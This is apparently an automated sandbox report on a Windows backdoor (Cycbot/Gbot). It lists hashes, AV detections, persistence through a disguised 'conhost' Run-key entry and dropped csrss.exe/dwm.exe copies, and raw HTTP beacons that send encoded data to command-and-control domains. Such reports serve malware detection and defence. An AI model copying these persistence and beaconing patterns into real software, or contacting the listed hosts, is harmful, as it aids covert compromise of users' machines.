Analysis Date2014-12-20 01:41:47
MD532b00c578558ce7fc2ada44b25573d39
SHA12df29feedbd919845de272bd7621218b489c2bfd

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e99281a08dc48647a1ad57d104284738 sha1: 2cb55824181f4e44f5c940c0c35ad1603756f5dd size: 112128
Section.tls md5: 10a8c61b3b395770bc0ff705962c3bf4 sha1: 07a4e17adee4d5f2d310b81abd8737ab7b90d843 size: 1024
Section.data md5: d12ff4f2652e14be8a95aba85441c0aa sha1: faecf12a9f1d37514a5f218a077051a746fd2fd7 size: 65536
Section.reloc md5: d421512d595f1c37ffc787c216bf474d sha1: 153cf0ef63e504590361fd2e445b81e618a20156 size: 1024
Timestamp2005-11-22 00:44:43
PEhash96e0568e6967c15897d5287b54d8ba9824722a23
IMPhashce10fee21e9a8b43ff33534a8c68b046
AV360 SafeGen:Heur.Conjar.9
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.9
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen8
AVBullGuardGen:Heur.Conjar.9
AVCA (E-Trust Ino)Win32/FakeAlert.J!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-7502
AVDr. WebBackDoor.Gbot.71 - infected, incurable
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.STB
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.o
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.DeadCryptor.01597

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSmediacontent4you.com
Winsock DNSfolusho.com
Winsock DNS127.0.0.1
Winsock DNSonlinemediaresource.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSfolusho.com
Type: A
67.222.55.143
DNSonlinemediaresource.com
Type: A
54.208.78.194
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSmediacontent4you.com
Type: A
109.74.196.143
HTTP GEThttp://folusho.com/wp-content/uploads/2010/09/web-20-what-is-300x251.jpg?v84=47&tq=gJ4WK%2FSUh7TFmkR8oY%2BQtMWTUj26kJH7yZpbK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP GEThttp://onlinemediaresource.com/blog/images/3521.jpg?v67=41&tq=gL5HtzyMv5rJsxG1J4Xo2rCyD%2FUvwr7UxUrEgPiWW1cg
User-Agent: mozilla/2.0
HTTP GEThttp://onlinemediaresource.com/blog/images/3521.jpg?v65=48&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNw1Kv975Xlm5G
User-Agent: mozilla/2.0
HTTP GEThttp://mediacontent4you.com/blog/images/3521.jpg?v19=54&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr0ejbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxr5ygm1C4lKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.222.55.143:80
Flows TCP192.168.1.1:1032 ➝ 54.208.78.194:80
Flows TCP192.168.1.1:1033 ➝ 54.208.78.194:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 109.74.196.143:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30392f   uploads/2010/09/
0x00000020 (00032)   7765622d 32302d77 6861742d 69732d33   web-20-what-is-3
0x00000030 (00048)   30307832 35312e6a 70673f76 38343d34   00x251.jpg?v84=4
0x00000040 (00064)   37267471 3d674a34 574b2532 46535568   7&tq=gJ4WK%2FSUh
0x00000050 (00080)   3754466d 6b52386f 59253242 51744d57   7TFmkR8oY%2BQtMW
0x00000060 (00096)   54556a32 366b4a48 37795a70 624b2532   TUj26kJH7yZpbK%2
0x00000070 (00112)   42253246 62785771 3153666b 49595542   B%2FbxWq1SfkIYUB
0x00000080 (00128)   4d204854 54502f31 2e300d0a 436f6e6e   M HTTP/1.0..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x000000a0 (00160)   6f73743a 20666f6c 7573686f 2e636f6d   ost: folusho.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 373d3431   /3521.jpg?v67=41
0x00000020 (00032)   2674713d 674c3548 747a794d 7635724a   &tq=gL5HtzyMv5rJ
0x00000030 (00048)   73784731 4a34586f 32724379 44253246   sxG1J4Xo2rCyD%2F
0x00000040 (00064)   55767772 37557855 72456750 69575731   Uvwr7UxUrEgPiWW1
0x00000050 (00080)   63672048 5454502f 312e300d 0a486f73   cg HTTP/1.0..Hos
0x00000060 (00096)   743a206f 6e6c696e 656d6564 69617265   t: onlinemediare
0x00000070 (00112)   736f7572 63652e63 6f6d0d0a 55736572   source.com..User
0x00000080 (00128)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000090 (00144)   322e300d 0a436f6e 6e656374 696f6e3a   2.0..Connection:
0x000000a0 (00160)   20636c6f 73650d0a 0d0a686f 2e636f6d    close....ho.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 353d3438   /3521.jpg?v65=48
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313757 3635724a   0ejbwvgS917W65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6f6e6c69 6e656d65 64696172 65736f75   onlinemediaresou
0x00000090 (00144)   7263652e 636f6d0d 0a416363 6570743a   rce.com..Accept:
0x000000a0 (00160)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000000b0 (00176)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000000c0 (00192)   0a65722d 4167656e 743a206d 6f7a696c   .er-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7731 4b763937 35586c6d   X%2BSNw1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7631 393d3534   /3521.jpg?v19=54
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   30656a62 77766753 39313758 3635724a   0ejbwvgS917X65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   6d656469 61636f6e 74656e74 34796f75   mediacontent4you
0x00000090 (00144)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x000000a0 (00160)   2a0d0a55 7365722d 4167656e 743a206d   *..User-Agent: m
0x000000b0 (00176)   6f7a696c 6c612f32 2e300d0a 0d0a0a20   ozilla/2.0..... 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316c5825 32425039 68253242 49307344   1lX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a735825 3242534e 78723579 676d3143   JsX%2BSNxr5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....


Strings
..
j
.
.~
...
...
.. .
.
4...
v
&*

080904b0
1.0.0.1
1815
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````````
  @`{" 
--------
,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,
//////////
[[[[[[[
@@&`@^
@&``^0
" `=0h
0HcJ:!
@0xM.4
@1?'4e
15_x:)
`1c`a#
1*`>_?g
@]1MtP
``1S9G
[2u0[U
2X.;nO
2,``-y
2z3rc';[@
  3"@ 
3RV042.
3Tv$>G
3 `@Zhz
491]8+
@4?FG,
4Pf~+F
/(  !5
>]5'~c
5fMeE"u
5KsJ-E
-5nErCgt
`#5O>/?}
5w`Wg$
6 @`A	
6jE-*`@?
6	q& `
_70_`V
7cjx/}D
$` 7^O
7O35ia
@ }{8`
" @9  
91'R8'WM-k
999999999999999999
)9E)63_
>9jRvo
9_oobo
9w-lJ!^
  a{4l
A	6KvA
AAAAAAAAA
@`Abo/
:a&:bR
ADVAPI32.dll
AE\v<q
AGx}[T
A/jz`A
A@m":$
az}]a/
@@|b2b
bbbbbbbbbb
`BBffI
 BfrK(
B_?h8Q"n
`"@`BUwZ
`bZtph
(  C  
Cbu}_E
cccccccc
 C( @E
CF%.gL
CGr`C~
cHa;" 
!ckl26
+CNEx0
cnMg"xX
Co9Mr]
%C--ty 
@c-`W+
c"@ Zv
`@D,``
]D2#;s
@.data
(/D]#D
DD&CZo
/D{=FEv
`@dg)>K
Dj~?7=w
DMyHpE&
D<:PG=
DRF@tH
dSI!-iH
DuplicateHandle
;-d?wo
]dzr)Q_@[
 >.@ )E
E{61W/
}e?ByW
EEEEEE
`eHhvS"
el}':8
EnumResourceNamesW
"`EP?h
eX)&` 
@@ex~Zq
f3{:J_
<f\Dyr
f(@@f,
FindClose
FindFirstFileA
FindResourceExA
FlushInstructionCache
F{T~}3
g#8GeNG
GetModuleFileNameW
  @@gl
?~GM.@
/gOyS]
`g>#R	
gUS%i\Jc>
GU{x5c4
gZrtQZ9:
  h1nbh
H5	hDA
 @@-%H8
`!HAwA
hb;^mp1
HF[	*R
hI8)Rx
Hj]d>th
Hk<9[bm
H~RBy+8
H][rUl?)
H})+^v
<HVyZv
h=\Z5VB-
I0cb"@
@ >i'4	z
ieu<C9
\}if!i
ig:UVm
Ij2O^x
IMmor1
IPq& @
Iw,&lIp3
``i<%z
&@`J/{
J3bm'E
J)<EB?+
jMTW;;
>jnBO,
j%-<t&@
`^J$W+
jwnzUT
`@;~KA
KERNEL32.dll
kF&` (
@@kKVF
+knlBUGv_a3A
Kt<OuX
_k@W @ 
 ``_kWKr
kwLThh
kwwhue
l0/HFv
L2,` :
lEb4v0
l_eM|:
L+Fnl>w
lkXx(Y
l"` [N
LOBioAZ5
l.@`Ww
L+XHWx
]L#zY?
m`8MX9
MapViewOfFile
MfM=4" 
MMMMMMMM
+M!S]A
+mz" `
`@N"  
N>4B	ON
NdrFixedArrayFree
[N^f#(
 nH7A1f
`o0Qna
o_[cx(
o>]!]~d
@O@$` H
oh.dll
OJTJ		
olRZ^K:
_>o<m,
OpenWaitableTimerW
  OtN4
O`[v+!^
P0?y@QN
*` P)5z
PathFileExistsW
 @pDcq
\PdE?j
. @Pfp
\P@gjk}
P+=(Ip
;<^P?j
`)PL-Yf9
p}|m_f$
 P:}%O
@pW'zN
">Q7"h
q*``~9
}qe*@`
qM>@>](
qNmWmW
QQQQQQQQQQQQQQ
q @@Sn`7
QwX0*`
QYs@QU>@
r @`(@
r8:_^x
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
riG!*TQ6@
Rk<U~B
RPCRT4.dll
:@RRm>z
RRRRRRRRRRRRR
@R-V4'
rxIg9rO
rYq;)}
^s49^a
[s=a#sm
sdy$GpA2Cj
{s;f(G
sG)Z]<|
SHELL32.dll
Shell_NotifyIconA
SHLWAPI.dll
% SItD
skA[lZ  
s	 `@n
=^'S/p
`spcrV
,s?_V.
T2'JKBV
tCanF~
!This program cannot be run in DOS mode.
th]zMk[g-
TIXr%bX
.@@)To
TPT*G{
TTTTTTTTTT
ttttttttttttttttttttttttt
  U* `
@`U&  
`Ug$@ CY
Ug\-emO
 u:m8x
UnmapViewOfFile
{U#+!oR
u@O/:'#X
uP6CSn
UuidCreate
uuuuuuuuuuuuuuuuuu
uV, `[
ux{P8&
&v2uyu
=V@<5o
@@Vbt&`
 @V @`G
Vnj @@H
voCLNe
 V+s_5&
@w9ZS*` 
_WAYX|
wn2RJ5
w[	Q.|}
?w>&Qv
wvh1>\io
WZ7eZDP
Wz{Y%E
x{@A\7
XAgE58
X=g4N6
Xg|A2J
/xpJ|Av)
x\V}-0}
XXXXXX
y/*/9F2D
Yaa<4`
>Yc5y(
y`+[GBK
ymn3Kt
y>m+X=
Yn$ @<
Y+n*}	3R
<Y;qM>%'`
yr`5,U
yyyyyyyy
Z^!*``
.Z+5.<
z$6,Xs
Z(``^[ZP
ZZZZZZZZ